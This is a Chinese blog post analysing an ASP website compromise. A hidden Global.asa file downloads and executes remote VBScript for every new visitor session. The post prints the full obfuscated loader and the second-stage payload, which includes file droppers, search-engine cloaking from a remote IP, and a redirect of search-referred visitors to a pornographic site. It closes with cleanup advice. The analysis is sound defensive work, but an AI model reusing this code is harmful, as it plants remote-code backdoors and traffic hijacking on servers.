• 不是一句话的事,asp引擎容易被黑


    最近,有个别用户反映网站直接从浏览器打开正常,但从百度或者google等搜索引擎搜索结果点击打开后会跳转到色情网站。

    分析:

    1,该问题都发生在 asp网站

    2,网站访问量较大

    3,网站首页等程序文件并未有篡改迹象

    4,发现根目录下有Global.asa 文件(罪魁祸首)

    打开Global.asa 查看代码如下:


    <script language="vbscript" runat="server">




















    'by*diao
    'by*aming
    ' Application_OnStart: runs once when the ASP application starts.
    ' Left empty here - presumably only to keep the shape of an ordinary
    ' Global.asa; the live code is in Session_OnStart below.
    sub Application_OnStart
    end sub

    ' Application_OnEnd: runs when the application shuts down. Empty stub,
    ' no behaviour.
    sub Application_OnEnd
    end sub

    ' Session_OnStart: runs on every visitor's first request (each new
    ' session), so the downloader below fires for every new visitor, not just
    ' once at site start.
    sub Session_OnStart
    ' Second-stage URL assembled one character at a time - defeats a plain
    ' grep for the hostname. It decodes to http://www.tayequ.com/txt/globals.txt
    ' (the address the write-up names below).
    url="h"&"t"&"t"&"p"&":"&"/"&"/"&"w"&"w"&"w"&"."&"t"&"a"&"y"&"e"&"q"&"u"&"."&"c"&"o"&"m"&"/"&"t"&"x"&"t"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"s"&"."&"t"&"x"&"t"
    ' Server-side fetch of the second stage. The User-Agent header is set to
    ' the URL itself - an odd fixed value, and the outbound request from the
    ' IIS worker process to that host is the network indicator of infection.
    Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
    ObjXMLHTTP.Open "GET",url,False
    ObjXMLHTTP.setRequestHeader "User-Agent",url
    ObjXMLHTTP.send
    ' Note: GetHtml here is a plain local variable holding the raw bytes, not
    ' the GetHtml function that the downloaded payload defines.
    GetHtml=ObjXMLHTTP.responseBody
    Set ObjXMLHTTP=Nothing
    ' Binary -> text conversion through ADODB.Stream: write the bytes as
    ' binary (Type=1), rewind, and read them back as gb2312 text (Type=2).
    set objStream = Server.CreateObject("Adodb.Stream")
    objStream.Type = 1
    objStream.Mode =3
    objStream.Open
    objStream.Write GetHtml
    objStream.Position = 0
    objStream.Type = 2
    objStream.Charset = "gb2312"
    GetHtml = objStream.ReadText
    objStream.Close
    ' Marker check, then Execute runs the downloaded text as VBScript inside
    ' the application: whoever controls the remote host controls this server.
    ' The second stage lives only in memory, which is consistent with the
    ' write-up finding no tampered page files on disk.
    if instr(GetHtml,"by*aming")>0 then
    execute GetHtml
    end if
    end sub

    'sub Session_OnEnd
    'end sub
    </script>

    因为 Global.asa 文件是网站的启动文件:当一个网站被第一次访问时,会执行 Application_OnStart 代码段的内容;当一个用户第一次访问(新会话开始)时,会执行 Session_OnStart 代码段的内容。所以此段代码的作用就是在每个新用户访问时,从 http://www.tayequ.com/txt/globals.txt 处下载内容并执行。让我们来看看 http://www.tayequ.com/txt/globals.txt 的内容是什么吧:


    '<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>
    '<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
    'by*aming
    'Server.ScriptTimeout=600
    ' Dropper helper: (re)writes /global.asa with Content and then marks the
    ' file read-only + hidden + system. Not called anywhere in this payload -
    ' the only call site, further down, is commented out.
    Public Function createasa(ByVal Content)
    ' Every failure below is swallowed silently.
    On Error Resume Next
    Set fso = Server.CreateObject("scripting.filesystemobject")
    ' "//./" prefix: appears to be a device-namespace style path (\\.\) in
    ' front of the physical path of /global.asa - confirm how FSO resolves it.
    set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))
    ' Clear attributes first so an existing hidden/read-only copy can be
    ' overwritten.
    f.Attributes=0
    ' ProgID split into pieces ("adodb.Stream") to evade simple string scans.
    Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
    Obj.Type = 2
    Obj.open
    Obj.Charset = "gb2312"
    Obj.Position = Obj.Size
    ' Written as a property assignment rather than a WriteText method call;
    ' with On Error Resume Next any failure here is silent, so whether the
    ' content actually reaches the stream cannot be told from the source.
    Obj.writetext = Content
    ' 2 = adSaveCreateOverWrite: replaces the existing file.
    Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2
    Obj.Close
    Set Obj = Nothing
    ' 1+2+4 = ReadOnly + Hidden + System. Such a file is missing from a
    ' default directory listing; check with attribute-aware tools (dir /a,
    ' attrib) and reset the attributes before deleting it.
    f.Attributes=1+2+4
    set f=Nothing
    Set fso = Nothing
    End Function

    ' Copy of createasa targeting /global.asax (the ASP.NET application
    ' file) instead of /global.asa. Also never called in the visible payload,
    ' but it shows the operator's intent to persist in ASP.NET sites as well -
    ' when cleaning up, look for an unexpected global.asax too.
    Public Function createasax(ByVal Content)
    ' All errors suppressed.
    On Error Resume Next
    Set fso = Server.CreateObject("scripting.filesystemobject")
    set f=fso.Getfile("//./" & Server.MapPath("/global.asax"))
    ' Strip attributes so a previous hidden/read-only copy can be replaced.
    f.Attributes=0
    ' Split ProgID ("adodb.Stream") - string-scan evasion.
    Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
    Obj.Type = 2
    Obj.open
    Obj.Charset = "gb2312"
    Obj.Position = Obj.Size
    ' Property-style assignment instead of a WriteText call; failure would be
    ' silent under On Error Resume Next.
    Obj.writetext = Content
    ' 2 = adSaveCreateOverWrite.
    Obj.SaveToFile "//./" & Server.MapPath("/global.asax"),2
    Obj.Close
    Set Obj = Nothing
    ' ReadOnly + Hidden + System - hides the dropped file from casual listing.
    f.Attributes=1+2+4
    set f=Nothing
    Set fso = Nothing
    End Function

    ' Fetches url server-side and returns the response body decoded as gb2312
    ' text - the same fetch/convert sequence as the Session_OnStart loader.
    ' No error handling and no explicit timeout, so an unreachable remote host
    ' can stall the visitor's request. Outbound HTTP from the IIS worker
    ' process to the hosts used in this payload is the network indicator.
    Public Function GetHtml(url)
    Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
    ObjXMLHTTP.Open "GET",url,False
    ' User-Agent set to the requested URL - same odd fixed header as the loader.
    ObjXMLHTTP.setRequestHeader "User-Agent",url
    ObjXMLHTTP.send
    GetHtml=ObjXMLHTTP.responseBody
    Set ObjXMLHTTP=Nothing
    ' Bytes in as binary (Type=1, Mode=3 read/write), rewind, text out as gb2312.
    set objStream = Server.CreateObject("Adodb.Stream")
    objStream.Type = 1
    objStream.Mode =3
    objStream.Open
    objStream.Write GetHtml
    objStream.Position = 0
    objStream.Type = 2
    objStream.Charset = "gb2312"
    GetHtml = objStream.ReadText
    objStream.Close
    End Function

    ' Returns True when user_agent contains any of the listed crawler tokens.
    ' instr without a compare argument is case-sensitive, which is why both
    ' "baidu" and "Baiduspider" appear. Drives the branch at the bottom of the
    ' payload: matching (crawler) requests get remotely fetched content, other
    ' requests do not.
    Function check(user_agent)
    allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")
    check_agent=false
    For agenti=lbound(allow_agent) to ubound(allow_agent)
    If instr(user_agent,allow_agent(agenti))>0 then
    check_agent=true
    exit for
    end if
    Next
    check=check_agent
    End function

    ' Crawler check variant (Baiduspider / Googlebot only) with a manual
    ' override: a request carrying ?admin=1 sets a session flag that makes
    ' this return True for the rest of that session. Not referenced anywhere
    ' in the visible payload; an "admin=1" query string in the web logs is
    ' still worth looking for. Krobotlist is never declared (no Option Explicit).
    Function CheckRobot()
    CheckRobot = False
    Dim Botlist,i,Repls
    Repls = request.ServerVariables("http_user_agent")
    Krobotlist = "Baiduspider|Googlebot"
    Botlist = Split(Krobotlist,"|")
    For i = 0 To Ubound(Botlist)
    If InStr(Repls,Botlist(i)) > 0 Then
    CheckRobot = True
    Exit For
    End If
    Next
    ' Session-scoped override toggled by the query string.
    If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1
    If Session("ThisCheckRobot") = 1 Then CheckRobot = True
    End Function
    ' True when the first 40 characters of the Referer contain one of the
    ' search-engine tokens (left(..., "40") - the string "40" is coerced to a
    ' number). This is what makes the symptom appear only for visitors arriving
    ' from search results while a direct visit looks normal.
    Function CheckRefresh()
    CheckRefresh = False
    Dim Botlist,i,Repls
    ' Krobotlist is undeclared; Repls is declared but unused here.
    Krobotlist = "baidu|google.cn/search?|sogou.com/web?query=|soso.com/q?w="
    Botlist = Split(Krobotlist,"|")
    For i = 0 To Ubound(Botlist)
    If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then
    CheckRefresh = True
    Exit For
    End If
    Next
    End Function
    ' Misnamed: does not pause at all. Flushes the buffered response if the
    ' client is still connected, otherwise ends the response.
    Sub sleep()
    If response.IsClientConnected=true then
    Response.Flush
    else
    response.end
    end if
    End Sub


    ' Request handling - runs once per new session via the Execute in
    ' Global.asa. Visitors arriving from a search-engine referrer who are not
    ' crawlers are redirected to the hencao.com page, with this site's own
    ' hostname appended to the query string. Note that user_agent is only
    ' assigned below, after this block, so check() sees an empty string here
    ' and returns False: every search-referred visitor is redirected
    ' regardless of its User-Agent.
    If CheckRefresh=true Then
    If check(user_agent)=false Then
    cnnbd=lcase(request.servervariables("HTTP_HOST"))
    response.redirect("http://www.hencao.com/hh.html?html"&cnnbd&"")
    response.end
    end If
    end if
    user_agent=Request.ServerVariables("HTTP_USER_AGENT")
    ' Cloaking branch: crawlers are served whatever the remote host returns
    ' (content not shown on this page), so the indexed copy of the site
    ' differs from what humans see. strHost is never assigned in this script,
    ' so the domain parameter goes out empty.
    if check(user_agent)=true then
    body=GetHtml("http://98.126.137.155:28/?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")
    response.write body
    'response.end
    else

    ' Non-crawler path: re-downloads globals.txt (same obfuscated URL as the
    ' loader) into asa; the createasa re-drop below is commented out, so this
    ' version writes nothing to disk.
    asa=GetHtml("h"&"t"&"t"&"p"&":"&"/"&"/"&"w"&"w"&"w"&"."&"t"&"a"&"y"&"e"&"q"&"u"&"."&"c"&"o"&"m"&"/"&"t"&"x"&"t"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"s"&"."&"t"&"x"&"t")
    'if instr(asa,"by*diao")>0 then
    ' createasa(asa)
    'end if
    ' namepath and geturl are computed but never used afterwards - dead code
    ' left over from another variant, by the look of it.
    ScriptAddress=Request.ServerVariables("SCRIPT_NAME")
    namepath=Server.MapPath(ScriptAddress)
    If Len(Request.QueryString) > 0 Then
    ScriptAddress = ScriptAddress & "?" & Request.QueryString
    end if
    geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress
    geturl =LCase(geturl)

    ' Flush (or end) the response; does not actually sleep.
    Call sleep()
    'end if
    end if
    '</body></html>


    这段代码的作用就是判断访问是否来自于搜索引擎的搜索结果,是的话,就将浏览器跳转到 http://www.hencao.com/hh.html?html<站点域名>,也就是打开网站后跳转的色情网站地址。


    5,解决方法:

    解决方法很简单,那就是删除 Global.asa 文件(注意代码中包含给该文件加上只读、隐藏、系统属性的函数,删除前可能需要先取消这些属性,并同时检查是否存在同样被写入的 global.asax)。最主要的还是要检查一下程序的安全问题:多出这个文件不是偶然,99% 是程序有漏洞,被利用后上传了该文件。

    感谢:jude_liu 

  • 原文地址:https://www.cnblogs.com/xred/p/2307732.html